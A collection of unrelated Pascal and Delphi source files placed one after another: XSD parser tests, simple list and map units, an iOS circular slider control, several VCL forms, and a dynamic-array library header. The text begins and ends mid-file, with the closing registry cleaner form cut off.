Assert.AreEqual(10.0, xsdLength.getValue(), 0); Assert.IsTrue(xsdLength.isFixed()); Assert.AreEqual('.*', xsdPattern.getValue()); Assert.IsTrue(xsdWhiteSpace.getValue().ToString = 'preserve'); Assert.AreEqual(xsdWhiteSpace.getValue().ToString, 'preserve'); Assert.assertFalse(xsdWhiteSpace.isFixed()); end; method ResrictionTest.testAnnotations; begin var schema: XsdSchema := schemas.First(); Assert.IsTrue(schema <> nil); var annotatedTypeOptional: XsdComplexType := schema .getChildrenComplexTypes() .Where(element -> element.getName().equals('annotatedElement')).First(); Assert.IsTrue(annotatedTypeOptional <> nil); var annotatedType: XsdComplexType := annotatedTypeOptional; var annotation: XsdAnnotation := annotatedType.getAnnotation(); Assert.isNotNil(annotation); var appInfoList: List<XsdAppInfo> := annotation.getAppInfoList(); var documentations: List<XsdDocumentation> := annotation.getDocumentations(); Assert.isNotNil(appInfoList); Assert.isNotNil(documentations); Assert.AreEqual(1, appInfoList.Count); Assert.AreEqual(1, documentations.Count); var appInfo: XsdAppInfo := appInfoList.First; var documentation: XsdDocumentation := documentations.First; Assert.AreEqual('source', appInfo.getSource()); Assert.AreEqual('source', documentation.getSource()); Check.AreEqual(appInfo.getContent(), 'Some text.'); Check.AreEqual(documentation.getContent(), 'Some documentation.'); end; method ResrictionTest.testList; begin var restrictedListOptional: XsdElement := elements //.stream() .Where(element -> element.getName().equals('restrictedList')).First(); Assert.IsTrue(restrictedListOptional <> nil); var restrictedListElement: XsdElement := restrictedListOptional; var simpleType: XsdSimpleType := restrictedListElement.getXsdSimpleType(); Assert.isNotNil(simpleType); var list: XsdList := simpleType.getList(); Assert.isNotNil(list); Assert.AreEqual(list.getId(), 'listId'); var listSimpleType: XsdSimpleType := list.getXsdSimpleType(); Assert.isNotNil(listSimpleType); var listRestrictions: List<XsdRestriction> := listSimpleType.getAllRestrictions(); Assert.AreEqual(1, listRestrictions.Count); var restriction: XsdRestriction := listRestrictions.First; Assert.isNotNil(restriction); var length: XsdLength := restriction.getLength(); var maxLength: XsdMaxLength := restriction.getMaxLength(); Assert.isNotNil(length); Assert.AreEqual(5.0, length.getValue(), 0); Assert.AreEqual(5.0, maxLength.getValue(), 0); end; method ResrictionTest.testDoubleRestrictions; begin var xsdSchemaOptional: XsdSchema := parser.getResultXsdSchemas().First(); Assert.IsTrue(xsdSchemaOptional <> nil); var xsdSchema: XsdSchema := xsdSchemaOptional; var simpleTypeObj: XsdSimpleType := xsdSchema .getChildrenSimpleTypes() .Where(simpleType -> simpleType.getName().equals('IDContatto')).First(); Assert.IsTrue(simpleTypeObj <> nil); var simpleType: XsdSimpleType := simpleTypeObj; var restriction: XsdRestriction := simpleType.getRestriction(); Assert.isNotNil(restriction); var minInclusive: XsdMinInclusive := restriction.getMinInclusive(); var maxInclusive: XsdMaxInclusive := restriction.getMaxInclusive(); Assert.isNotNil(minInclusive); Assert.isNotNil(maxInclusive); Assert.AreEqual(minInclusive.getValue(), 99999999999999.0); Assert.AreEqual(maxInclusive.getValue(),99999999999999.9); end; method ResrictionTest.remainingTypesVerification; begin var schema: XsdSchema := schemas.First; var groupOptional: XsdGroup := schema.getChildrenGroups().First(); Assert.IsTrue(groupOptional <> nil); var &group: XsdGroup := groupOptional; Assert.AreEqual('randomGroup', &group.getName()); var all: XsdAll := &group.getChildAsAll(); Assert.IsNil(&group.getChildAsChoice()); Assert.isNil(&group.getChildAsSequence()); Assert.isNotNil(all); var allChildren: List<XsdElement> := all.getChildrenElements().toList(); Assert.AreEqual(1, allChildren.Count); var element: XsdElement := allChildren.First; var complexType: XsdComplexType := element.getXsdComplexType(); Assert.isNotNil(complexType); var simpleContent: XsdSimpleContent := complexType.getSimpleContent(); Assert.isNotNil(simpleContent); var &extension: XsdExtension := simpleContent.getXsdExtension(); Assert.isNotNil(&extension); var base: XsdComplexType := &extension.getBaseAsComplexType(); Check.isNotNil(base); Check.AreEqual(base:getName(),'annotatedElement'); end; method ResrictionTest.testExtensionBase; begin var schema := schemas.First(); Assert.IsTrue(schema <> nil); var baseTypeExpectedOptional: XsdComplexType := schema .getChildrenComplexTypes() .Where((xsdComplexType) -> xsdComplexType.getName().equals('baseType')).First(); Assert.IsTrue(baseTypeExpectedOptional <> nil); var baseTypeExpected: XsdComplexType := baseTypeExpectedOptional; var root:= elements //.stream() .Where((element) -> element.getName().equals('root')) .First(); Assert.IsTrue(root <> nil); var extendedType: XsdComplexType := root.getXsdComplexType(); Check.IsNotNil(extendedType); Check.AreEqual(extendedType:getName, 'extendedType'); var complexContent: XsdComplexContent := extendedType.getComplexContent(); Assert.IsNotNil(complexContent); var &extension: XsdExtension := complexContent.getXsdExtension(); var baseType: XsdComplexType := &extension.getBaseAsComplexType(); Assert.AreEqual(baseTypeExpected, baseType); Assert.IsNotNil(&extension); // Shuld have on1 child the sequenze Assert.AreEqual(&extension.getElements.Count, 1); var &sequence := &extension.getChildAsSequence(); Assert.IsNotNil(&sequence); var element := &sequence.getChildrenElements().First(); Assert.IsTrue(element <> nil); Assert.AreEqual('additionElement', element.getName()); end; end.
unit uArrayListOfInt; interface uses uArrayList; { Stores ints } type _Int = class(TObject) public num: integer; end; // parser function TInt(i: integer): _Int; { Automatic dynamic int array } type ArrayListOfInt = class(ArrayList) public procedure add(i: integer); overload; procedure put(i, index: integer); overload; function remove(index: integer): integer; overload; function get(index: integer): integer; overload; function find(i: integer): integer; overload; end; implementation // _Int function TInt(i: integer): _Int; begin TInt := _Int.Create(); TInt.num := i; end; // ArrayListOfInt procedure ArrayListOfInt.add(i: integer); begin inherited add(TInt(i)); end; // ArrayListOfInt procedure ArrayListOfInt.put(i, index: integer); begin inherited put(TInt(i)); end; // ArrayListOfInt function ArrayListOfInt.remove(index: integer): integer; begin remove := (inherited remove(index) as _Int).num; end; // ArrayListOfInt function ArrayListOfInt.get(index: integer): integer; begin get := (inherited get(index) as _Int).num; end; // ArrayListOfInt function ArrayListOfInt.find(i: integer): integer; var j: integer; begin find := -1; for j := 0 to len - 1 do if i = get(j) then begin find := j; break; end; end; end.
namespace CircularSlider; interface // Based on "How to build a custom control in iOS // by Yari D'areglia (@Yariok), February 2012, 2013. // http://www.thinkandbuild.it/how-to-build-a-custom-control-in-ios/ // converted to Oxygene in maybe 30 minutes of work (without Oxidizer) uses UIKit; type [IBObject] TBCircularSlider = public class(UIControl) private fRadius: CGFloat; fTextField: UITextField; method ToRad(deg: CGFloat): CGFloat; inline; method ToDeg(rad: CGFloat): CGFloat; inline; method SQR(x: CGFloat): CGFloat; inline; method angleFromNorth(p1, p2: CGPoint; aFlipped: Boolean): CGFloat; inline; method drawHandle(aContext: CGContextRef); method moveHandle(aLastPoint: CGPoint); method pointFromAngle(aAngle: Int32): CGPoint; protected public method initWithFrame(aFrame: CGRect): id; override; method beginTrackingWithTouch(touch: not nullable UITouch) withEvent(&event: UIEvent): Boolean; override; method continueTrackingWithTouch(touch: not nullable UITouch) withEvent(&event: UIEvent): Boolean; override; method endTrackingWithTouch(touch: UITouch) withEvent(&event: UIEvent); override; method drawRect(rect: CGRect); override; property angle: Int32; const TB_SLIDER_SIZE = 320; //The width and the heigth of the slider TB_BACKGROUND_WIDTH = 60; //The width of the dark background TB_LINE_WIDTH = 40; //The width of the active area (the gradient) and the width of the handle TB_FONTSIZE = 65; //The size of the textfield font TB_FONTFAMILY = 'Futura-CondensedExtraBold'; //The font family of the textfield font TB_SAFEAREA_PADDING = 60.0; end; implementation method TBCircularSlider.initWithFrame(aFrame: CGRect): id; begin self := inherited initWithFrame(aFrame); if assigned(self) then begin opaque := NO; //Define the circle radius taking into account the safe area fRadius := frame.size.width/2 - TB_SAFEAREA_PADDING; //Initialize the Angle at 0 angle := 360; //Define the Font var lFont := UIFont.fontWithName(TB_FONTFAMILY) size(TB_FONTSIZE); //Calculate font size needed to display 3 numbers var lStr := '000'; var lFontSize := lStr.sizeWithFont(lFont); //61103: Toffee: Internal error: Unknown type "x" //Using a TextField area we can easily modify the control to get user input from this field fTextField := new UITextField withFrame(CGRectMake((frame.size.width - lFontSize.width) /2, (frame.size.height - lFontSize.height) /2, lFontSize.width, lFontSize.height)); fTextField.backgroundColor := UIColor.clearColor; fTextField.textColor := UIColor.colorWithWhite(1) alpha(0.8); fTextField.textAlignment := NSTextAlignment.NSTextAlignmentCenter; fTextField.font := lFont; fTextField.text := NSString.stringWithFormat('%d',angle); fTextField.enabled := NO; addSubview(fTextField); end; result := self; end; method TBCircularSlider.beginTrackingWithTouch(touch: not nullable UITouch) withEvent(&event: UIEvent): Boolean; begin inherited; //We need to track continuously result := true; end; method TBCircularSlider.continueTrackingWithTouch(touch: not nullable UITouch) withEvent(&event: UIEvent): Boolean; begin inherited; //Get touch location var lastPoint := touch.locationInView(self); //Use the location to design the Handle moveHandle(lastPoint); //Control value has changed, let's notify that sendActionsForControlEvents(UIControlEvents.UIControlEventValueChanged); result := true; end; method TBCircularSlider.endTrackingWithTouch(touch: UITouch) withEvent(&event: UIEvent); begin inherited; end; method TBCircularSlider.drawRect(rect: CGRect); begin inherited; var lContext := UIGraphicsGetCurrentContext(); //* Draw the Background *// //Create the path CGContextAddArc(lContext, frame.size.width/2, frame.size.height/2, fRadius, 0, M_PI *2, 0); //Set the stroke color to black UIColor.blackColor.setStroke(); //Define line width and cap CGContextSetLineWidth(lContext, TB_BACKGROUND_WIDTH); CGContextSetLineCap(lContext, CGLineCap.kCGLineCapButt); //draw it! CGContextDrawPath(lContext, CGPathDrawingMode.kCGPathStroke); //** Draw the circle (using a clipped gradient) **// //** Create THE MASK Image **// UIGraphicsBeginImageContext(CGSizeMake(TB_SLIDER_SIZE,TB_SLIDER_SIZE)); var imagelContext := UIGraphicsGetCurrentContext(); CGContextAddArc(imagelContext, frame.size.width/2 , frame.size.height/2, fRadius, 0, ToRad(angle), 0); UIColor.redColor.set(); //Use shadow to create the Blur effect CGContextSetShadowWithColor(imagelContext, CGSizeMake(0, 0), angle/20, UIColor.blackColor.CGColor); //define the path CGContextSetLineWidth(imagelContext, TB_LINE_WIDTH); CGContextDrawPath(imagelContext, CGPathDrawingMode.kCGPathStroke); //save the context content into the image mask var mask := CGBitmapContextCreateImage(UIGraphicsGetCurrentContext()); UIGraphicsEndImageContext(); //** Clip Context to the mask **// CGContextSaveGState(lContext); CGContextClipToMask(lContext, bounds, mask); CGImageRelease(mask); //** THE GRADIENT **// //list of components var components: array[0..7] of CGFloat := [0.0, 0.0, 1.0, 1.0, // Start color - Blue 1.0, 0.0, 1.0, 1.0]; // End color - Violet var baseSpace := CGColorSpaceCreateDeviceRGB(); var gradient := CGGradientCreateWithColorComponents(baseSpace, components, nil, 2); CGColorSpaceRelease(baseSpace); baseSpace := nil; //Gradient direction var startPoint := CGPointMake(CGRectGetMidX(rect), CGRectGetMinY(rect)); var endPoint := CGPointMake(CGRectGetMidX(rect), CGRectGetMaxY(rect)); //Draw the gradient CGContextDrawLinearGradient(lContext, gradient, startPoint, endPoint, 0); CGGradientRelease(gradient); gradient := nil; CGContextRestoreGState(lContext); //** Add some light reflection effects on the background circle**// CGContextSetLineWidth(lContext, 1); CGContextSetLineCap(lContext, CGLineCap.kCGLineCapRound); //Draw the outside light CGContextBeginPath(lContext); CGContextAddArc(lContext, frame.size.width/2 , frame.size.height/2, fRadius+TB_BACKGROUND_WIDTH/2, 0, ToRad(-angle), 1); UIColor.colorWithWhite(1.0) alpha(0.05).set(); CGContextDrawPath(lContext, CGPathDrawingMode.kCGPathStroke); //draw the inner light CGContextBeginPath(lContext); CGContextAddArc(lContext, frame.size.width/2 , frame.size.height/2, fRadius-TB_BACKGROUND_WIDTH/2, 0, ToRad(-angle), 1); UIColor.colorWithWhite(1.0) alpha(0.05).set(); CGContextDrawPath(lContext, CGPathDrawingMode.kCGPathStroke); //** Draw the handle **// drawHandle(lContext); end; method TBCircularSlider.drawHandle(aContext: CGContextRef); begin CGContextSaveGState(aContext); //I Love shadows CGContextSetShadowWithColor(aContext, CGSizeMake(0, 0), 3, UIColor.blackColor.CGColor); //61106: Toffee: Toffee: Internal error: Attempted to read or write protected memory. in CircularSlider project //Get the handle position var handleCenter := pointFromAngle(angle); //Draw It! UIColor.colorWithWhite(1.0) alpha(0.7).set(); CGContextFillEllipseInRect(aContext, CGRectMake(handleCenter.x, handleCenter.y, TB_LINE_WIDTH, TB_LINE_WIDTH)); CGContextRestoreGState(aContext); end; method TBCircularSlider.moveHandle(aLastPoint: CGPoint); begin //Get the center var centerPoint := CGPointMake(frame.size.width/2, frame.size.height/2); //Calculate the direction from a center point and a arbitrary position. var currentAngle := angleFromNorth(centerPoint, aLastPoint, NO); //Message 1 (H11) Local variable "angleFromNorth.8.self" is assigned to but never read Z:\Code\Toffee Tests\CircularSlider\TBCircularSlider.pas 233 23 CircularSlider var angleInt := floor(currentAngle); //Store the new angle angle := 360 - Int32(angleInt); //Update the textfield fTextField.text := NSString.stringWithFormat('%d', angle); //Redraw setNeedsDisplay(); end; method TBCircularSlider.pointFromAngle(aAngle: Int32): CGPoint; begin //Circle center var centerPoint := CGPointMake(frame.size.width/2 - TB_LINE_WIDTH/2, frame.size.height/2 - TB_LINE_WIDTH/2); //The point position on the circumference result.y := round(centerPoint.y + fRadius * sin(ToRad(-aAngle))) ; result.x := round(centerPoint.x + fRadius * cos(ToRad(-aAngle))); end; method TBCircularSlider.angleFromNorth(p1: CGPoint; p2: CGPoint; aFlipped: Boolean): CGFloat; begin var v := CGPointMake(p2.x-p1.x,p2.y-p1.y); var vmag := sqrt(SQR(v.x) + SQR(v.y)); v.x := v.x / vmag; v.y := v.y / vmag; var radians := atan2(v.y,v.x); result := ToDeg(radians); if result < 0 then result := result + 360.0; end; method TBCircularSlider.ToRad(deg: CGFloat): CGFloat; begin result := ( (M_PI * (deg)) / 180.0 ) end; method TBCircularSlider.ToDeg(rad: CGFloat): CGFloat; begin result := ( (180.0 * (rad)) / M_PI ) end; method TBCircularSlider.SQR(x: CGFloat): CGFloat; begin result := ( (x) * (x) ); end; end.
unit ideSHToolboxFrm; interface uses SHDesignIntf, ideSHDesignIntf, Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, ExtCtrls, Contnrs, pSHNetscapeSplitter; type TToolboxForm = class(TSHComponentForm, IideSHToolbox) Panel1: TPanel; pSHNetscapeSplitter1: TpSHNetscapeSplitter; Panel2: TPanel; procedure pSHNetscapeSplitter1Moved(Sender: TObject); private { Private declarations } FPalette: TForm; FInspList: TObjectList; FInspector: TForm; public { Public declarations } constructor Create(AOwner: TComponent; AParent: TWinControl; AComponent: TSHComponent; ACallString: string); override; destructor Destroy; override; procedure ReloadComponents; procedure InvalidateComponents; procedure SetToolboxPosition(ToBottom: Boolean); procedure _InspCreateForm(AComponent: TSHComponent); function _InspFindForm(AComponent: TSHComponent): TSHComponentForm; procedure _InspDestroyForm(AComponent: TSHComponent); procedure _InspHideForm(AComponent: TSHComponent); procedure _InspShowForm(AComponent: TSHComponent); procedure _InspRefreshForm(AComponent: TSHComponent); procedure _InspPrepareForm(AComponent: TSHComponent); procedure _InspAddAction(AAction: TSHAction); procedure _InspUpdateNodes; end; var ToolboxForm: TToolboxForm; implementation uses ideSHConsts, ideSHSystem, ideSHSysUtils, ideSHComponentPageFrm, ideSHObjectInspectorFrm; {$R *.dfm} { TToolboxForm } constructor TToolboxForm.Create(AOwner: TComponent; AParent: TWinControl; AComponent: TSHComponent; ACallString: string); begin inherited Create(AOwner, AParent, AComponent, ACallString); FPalette := TComponentPageForm.Create(Panel1, Panel1, Component, EmptyStr); FPalette.Visible := True; FInspList := TObjectList.Create; if Assigned(SystemOptionsIntf) then Panel2.Height := SystemOptionsIntf.IDE2Height; end; destructor TToolboxForm.Destroy; begin FPalette.Free; FInspector := nil; FInspList.Free; inherited Destroy; end; procedure TToolboxForm.ReloadComponents; begin if Assigned(FPalette) then TComponentPageForm(FPalette).ReloadComponents; end; procedure TToolboxForm.InvalidateComponents; begin if Assigned(FPalette) then TComponentPageForm(FPalette).Tree.Invalidate; end; procedure TToolboxForm.SetToolboxPosition(ToBottom: Boolean); begin if ToBottom then begin pSHNetscapeSplitter1.Align := alNone; Panel2.Align := alBottom; Panel2.TabOrder := 1; pSHNetscapeSplitter1.Align := alBottom; Panel1.Align := alClient; Panel1.TabOrder := 0; end else begin pSHNetscapeSplitter1.Align := alNone; Panel2.Align := alTop; Panel2.TabOrder := 0; pSHNetscapeSplitter1.Align := alTop; Panel1.Align := alClient; Panel1.TabOrder := 1; end; end; procedure TToolboxForm._InspCreateForm(AComponent: TSHComponent); begin FInspList.Add(TObjectInspectorForm.Create(Panel2, Panel2, AComponent, EmptyStr)); if FInspList.Count > 0 then Panel2.BevelInner := bvNone; end; function TToolboxForm._InspFindForm(AComponent: TSHComponent): TSHComponentForm; var I: Integer; begin Result := nil; for I := 0 to Pred(FInspList.Count) do begin if TSHComponentForm(FInspList[I]).Component = AComponent then begin Result := TSHComponentForm(FInspList[I]); Break; end; end; end; procedure TToolboxForm._InspDestroyForm(AComponent: TSHComponent); var Form: TForm; begin Form := _InspFindForm(AComponent); if Assigned(Form) then begin FInspector := nil; FInspList.Remove(Form); if FInspList.Count = 0 then Panel2.BevelInner := bvLowered; end; end; procedure TToolboxForm._InspHideForm(AComponent: TSHComponent); var Form: TForm; begin Form := _InspFindForm(AComponent); if Assigned(Form) then Form.Hide; end; procedure TToolboxForm._InspShowForm(AComponent: TSHComponent); var Form: TForm; I: Integer; WindowLocked: Boolean; begin Form := _InspFindForm(AComponent); if Assigned(Form) then begin WindowLocked := LockWindowUpdate(GetDesktopWindow); try FInspector := Form; Form.Show; for I := 0 to Pred(FInspList.Count) do if TSHComponentForm(FInspList[I]).Component <> AComponent then TSHComponentForm(FInspList[I]).Hide; finally if WindowLocked then LockWindowUpdate(0); end; end; end; procedure TToolboxForm._InspRefreshForm(AComponent: TSHComponent); begin end; procedure TToolboxForm._InspPrepareForm(AComponent: TSHComponent); begin end; procedure TToolboxForm._InspAddAction(AAction: TSHAction); begin if Assigned(FInspector) then TObjectInspectorForm(FInspector).AddAction(AAction); end; procedure TToolboxForm._InspUpdateNodes; begin if Assigned(FInspector) then TObjectInspectorForm(FInspector).UpdateNodes; end; procedure TToolboxForm.pSHNetscapeSplitter1Moved(Sender: TObject); begin if Assigned(SystemOptionsIntf) then SystemOptionsIntf.IDE2Height := Panel2.Height; end; end.
unit uShortCut_AE; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, cxLookAndFeelPainters, cxContainer, cxEdit, cxTextEdit, StdCtrls, cxControls, cxGroupBox, cxButtons, uConsts, Menus, ibase, cxMaskEdit, cxButtonEdit, cxCheckBox, ComCtrls; type TfrmShortCut_AE = class(TForm) OkButton: TcxButton; CancelButton: TcxButton; cxGroupBox1: TcxGroupBox; NameLabel: TLabel; Name_Edit: THotKey; procedure OkButtonClick(Sender: TObject); procedure CancelButtonClick(Sender: TObject); procedure FormShow(Sender: TObject); procedure FormKeyPress(Sender: TObject; var Key: Char); private PLanguageIndex : byte; procedure FormIniLanguage(); public ID_NAME : int64; DB_Handle : TISC_DB_HANDLE; constructor Create(AOwner:TComponent; LanguageIndex : byte);reintroduce; end; implementation {$R *.dfm} constructor TfrmShortCut_AE.Create(AOwner:TComponent; LanguageIndex : byte); begin Screen.Cursor:=crHourGlass; inherited Create(AOwner); PLanguageIndex:= LanguageIndex; FormIniLanguage(); Screen.Cursor:=crDefault; end; procedure TfrmShortCut_AE.FormIniLanguage; begin NameLabel.caption:= uConsts.bs_FullName[PLanguageIndex]; OkButton.Caption:= uConsts.bs_Accept[PLanguageIndex]; CancelButton.Caption:= uConsts.bs_Cancel[PLanguageIndex]; end; procedure TfrmShortCut_AE.OkButtonClick(Sender: TObject); begin If (name_edit.hotkey = Ord(0)) then begin ShowMessage('Необхідно заповнити усі поля!'); exit; end; ModalResult := mrOk; end; procedure TfrmShortCut_AE.CancelButtonClick(Sender: TObject); begin close; end; procedure TfrmShortCut_AE.FormShow(Sender: TObject); begin Name_Edit.SetFocus; end; procedure TfrmShortCut_AE.FormKeyPress(Sender: TObject; var Key: Char); begin if Key = #27 then Begin Name_Edit.InvalidKeys := []; Name_Edit.Modifiers := []; Name_Edit.HotKey := ord(27); end; if Key = #13 then Begin Name_Edit.InvalidKeys := []; Name_Edit.Modifiers := []; Name_Edit.HotKey := ord(13); end; end; end.
unit USpecific; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, Buttons, ExtCtrls; type TfmSpecific = class(TForm) Panel1: TPanel; Panel2: TPanel; btOk: TBitBtn; BitBtn2: TBitBtn; Panel3: TPanel; GroupBox1: TGroupBox; rbNewValue: TRadioButton; rbOldValue: TRadioButton; rbType: TRadioButton; rbAddress: TRadioButton; edValue: TEdit; Label1: TLabel; rbHint: TRadioButton; GroupBox2: TGroupBox; rbRemove: TRadioButton; rbSelect: TRadioButton; rbCheck: TRadioButton; rbChange: TRadioButton; edChange: TEdit; procedure btOkClick(Sender: TObject); procedure rbChangeClick(Sender: TObject); private { Private declarations } public { Public declarations } end; var fmSpecific: TfmSpecific; implementation {$R *.DFM} procedure TfmSpecific.btOkClick(Sender: TObject); begin if not rbChange.Checked then if trim(edValue.Text)='' then begin ShowMessage('Input Value !'); edValue.SetFocus; exit; end; ModalResult:=mrOk; end; procedure TfmSpecific.rbChangeClick(Sender: TObject); begin edChange.Enabled:=rbChange.Checked; if edChange.Enabled then edChange.Color:=clWindow else edChange.Color:=clBtnFace; end; end.
{------------------------------------------------------------------------------- This Source Code Form is subject to the terms of the Mozilla Public License, v. 2.0. If a copy of the MPL was not distributed with this file, You can obtain one at http://mozilla.org/MPL/2.0/. -------------------------------------------------------------------------------} {=============================================================================== Counted Dynamic Arrays Basic types and constants This library is designed to ease work with dynamic arrays and also slightly optimize reallocation of the array. The array itself is hidden in a record that must be considered opaque, but is in fact completely accessible so the compiler can work around it. To allow growing and shrinking optimizations, count of the items inside an array is separated from the actual array and its length/capacity (hence the name counted dynamic arrays). WARNING - It is strictly prohibited to directly access fields of the underlying record, use only the provided functions to do so. Standard functions like Length, SetLength or Copy are implemented along with many more functions that allow accessing the array in a way similar to accessing a list object (Add, Remove, IndexOf, Sort, ...). All implemented functions have CDA_ prefix (e.g CDA_Length). This library comes with preimplemented arrays for several basic types (integers, floats, strings, ...), but is designed so the codebase can be used with minor or no modifications for any other type (including, but not limited to, structured types like records or arrays) - it uses templates and type aliases as a kind of generics. Arrays of following types are implemented in current version of this library: Boolean CountedDynArrayBool.pas Int8 CountedDynArrayInt8.pas UInt8 CountedDynArrayUInt8.pas Int16 CountedDynArrayInt16.pas UInt16 CountedDynArrayUInt16.pas Int32 CountedDynArrayInt32.pas UInt32 CountedDynArrayUInt32.pas Int64 CountedDynArrayInt64.pas UInt64 CountedDynArrayUInt64.pas PtrInt CountedDynArrayPtrInt.pas PtrUInt CountedDynArrayPtrUInt.pas Integer CountedDynArrayInteger.pas Float32 CountedDynArrayFloat32.pas Float64 CountedDynArrayFloat64.pas TDateTime CountedDynArrayDateTime.pas Currency CountedDynArrayCurrency.pas Pointer CountedDynArrayPointer.pas TObject CountedDynArrayTObject.pas AnsiChar CountedDynArrayAnsiChar.pas UTF8Char CountedDynArrayUTF8Char.pas WideChar CountedDynArrayWideChar.pas UnicodeChar CountedDynArrayUnicodeChar.pas Char CountedDynArrayChar.pas ShortString CountedDynArrayShortString.pas AnsiString CountedDynArrayAnsiString.pas UTF8String CountedDynArrayUTF8String.pas WideString CountedDynArrayWideString.pas UnicodeString CountedDynArrayUnicodeString.pas String CountedDynArrayString.pas Variant CountedDynArrayVariant.pas Note that given the method used (template with type alias), there is a limit of one array type per *.pas file. For help with implementing a counted dynamic array for any type, please refer to already implemented arrays or contact the author. Version 1.2.1 (2019-08-19) Last changed 2019-08-19 ©2018-2019 František Milt Contacts: František Milt: frantisek.milt@gmail.com Support: If you find this code useful, please consider supporting its author(s) by making a small donation using the following link(s): https://www.paypal.me/FMilt Changelog: For detailed changelog and history please refer to this git repository: github.com/TheLazyTomcat/Lib.AuxClasses Dependencies: AuxTypes - github.com/TheLazyTomcat/Lib.AuxTypes AuxClasses - github.com/TheLazyTomcat/Lib.AuxClasses ListSorters - github.com/TheLazyTomcat/Lib.ListSorters StrRect - github.com/TheLazyTomcat/Lib.StrRect ===============================================================================} unit CountedDynArrays; {$INCLUDE '.\CountedDynArrays_defs.inc'} interface uses AuxTypes; type TCDASignature = PtrUInt; TCDAChecksum = PtrUInt; TCDAIndexArray = array of Integer; PCDAIndexArray = ^TCDAIndexArray; {$IF SizeOf(TCDAIndexArray) <> SizeOf(Pointer)} {$MESSAGE Fatal 'Incompatible implementation detail.'} {$IFEND} { Array is only grown if current count + DeltaMin is larger than current capacity. agmSlow - grow by 1 agmLinear - grow by GrowFactor (integer part of the float) agmFast - grow by capacity * GrowFactor agmFastAttenuated - if capacity is below DYNARRAY_GROW_ATTENUATE_THRESHOLD, then grow by capacity * GrowFactor - if capacity is above or equal to DYNARRAY_GROW_ATTENUATE_THRESHOLD, grow by 1/16 * DYNARRAY_GROW_ATTENUATE_THRESHOLD If mode is other than agmSlow and current capacity is 0, then new capacity is set to DYNARRAY_INITIAL_CAPACITY, irrespective of selected grow mode. } TCDAGrowMode = (agmSlow, agmLinear, agmFast, agmFastAttenuated); { asmKeepCap - array is not shrinked, capacity is preserved asmNormal - if capacity is above DYNARRAY_INITIAL_CAPACITY and count is below capacity div 4, then capacity is set to capacity div 4, otherwise capacity is preserved - if capacity is below or equal to DYNARRAY_INITIAL_CAPACITY, then the array is not shinked unless the count is 0, in which case the new capacity is set to 0 asmToCount - capacity is set to count } TCDAShrinkMode = (asmKeepCap, asmNormal, asmToCount); const CDA_INITIAL_CAPACITY = 16; CDA_GROW_ATTENUATE_THRESHOLD = 16 * 1024 * 1024; implementation initialization System.Randomize; // required for signature initialization end.
unit TesteSGA.Main; interface uses DUnitX.TestFramework; type [TestFixture] TTesteSGA = class public [Setup] procedure Setup; [TearDown] procedure TearDown; // Sample Methods // Simple single Test [Test] procedure Test1; // Test with TestCase Attribute to supply parameters. [Test] [TestCase('TestA','1,2')] [TestCase('TestB','3,4')] procedure Test2(const AValue1 : Integer;const AValue2 : Integer); end; implementation procedure TTesteSGA.Setup; begin end; procedure TTesteSGA.TearDown; begin end; procedure TTesteSGA.Test1; begin end; procedure TTesteSGA.Test2(const AValue1 : Integer;const AValue2 : Integer); begin // Assert.AreEqual(AValue1, AValue2,'Os valores não são iguais'); Assert.AreNotEqual(AValue1, AValue2,'Os valores são iguais'); end; initialization TDUnitX.RegisterTestFixture(TTesteSGA); end.
unit uStringMap; interface uses uMap, uArrayListOfString, uArrayList; { Automatic dynamic str map } type StringMap = class(Map) public constructor Create(); override; function find(key: String): integer; overload; procedure add(key: String; value: TObject); overload; function remove(key: String): TObject; overload; function get(key: String): TObject; overload; function getKeys(): ArrayListOfString; overload; end; implementation // StringMap constructor StringMap.Create(); begin keys := ArrayListOfString.Create(); vals := ArrayList.Create(); end; // StringMap function StringMap.find(key: String): integer; var i: integer; begin find := -1; for i := 0 to keys.size() - 1 do if key = (keys as ArrayListOfString).get(i) then begin find := i; break; end; end; // StringMap procedure StringMap.add(key: String; value: TObject); begin (keys as ArrayListOfString).add(key); vals.add(value); end; // StringMap function StringMap.remove(key: String): TObject; var index: integer; begin remove := nil; index := find(key); if index > -1 then begin keys.remove(index); remove := vals.remove(index); end; end; // StringMap function StringMap.get(key: String): TObject; var index: integer; begin get := nil; index := find(key); if index > -1 then get := vals.get(index); end; // StringMap function StringMap.getKeys(): ArrayListOfString; begin getKeys := (keys as ArrayListOfString); end; end.
unit RegistryCleaner_Settings; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, IniFiles, Dialogs, StdCtrls, Grids, AdvObj, BaseGrid, AdvGrid, AdvGlowButton, ExtCtrls; type TfmSettings = class(TForm) lbRegExclusions: TLabel; GridRegException: TAdvStringGrid; btAddRegExclusion: TButton; btRemoveRegExclusion: TButton; ShapeBottom: TShape; btOK: TAdvGlowButton; btCancel: TAdvGlowButton; btDefault: TButton; procedure btCancelClick(Sender: TObject); procedure FormCreate(Sender: TObject); procedure btOKClick(Sender: TObject); procedure btAddRegExclusionClick(Sender: TObject); procedure btRemoveRegExclusionClick(Sender: TObject); procedure btDefaultClick(Sender: TObject); procedure ApplyLang; private { Private declarations } public { Public declarations } end; var fmSettings: TfmSettings; implementation uses DataMod, RegistryCleaner_RegExceptions; {$R *.dfm} {ЧТЕНИЕ ЯЗЫКОВОЙ СТРОКИ ИЗ ОПРЕДЕЛЁННОГО ФАЙЛА} function ReadLangStr(FileName, Section, Caption: PChar): PChar; external 'Functions.dll'; //========================================================= {КНОПКА "ОТМЕНА"} //--------------------------------------------------------- procedure TfmSettings.btCancelClick(Sender: TObject); begin Close; end; //========================================================= //========================================================= {КНОПКА "OK"} //--------------------------------------------------------- procedure TfmSettings.btOKClick(Sender: TObject); var i, j: integer; ExceptionFile: TIniFile; begin if not DirectoryExists(fmDataMod.PathToUtilityFolder) then SysUtils.ForceDirectories(fmDataMod.PathToUtilityFolder); ExceptionFile := TIniFile.Create(fmDataMod.PathToUtilityFolder+'RegExceptions.ini'); ExceptionFile.EraseSection('etKeyAddr'); ExceptionFile.EraseSection('etText'); fmDataMod.RegExceptions := nil; for i := 1 to GridRegException.RowCount-1 do begin SetLength(fmDataMod.RegExceptions, Length(fmDataMod.RegExceptions)+1); if GridRegException.Cells[1, i] = ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'RegKey') then fmDataMod.RegExceptions[i-1].ExceptionType := etKeyAddr else 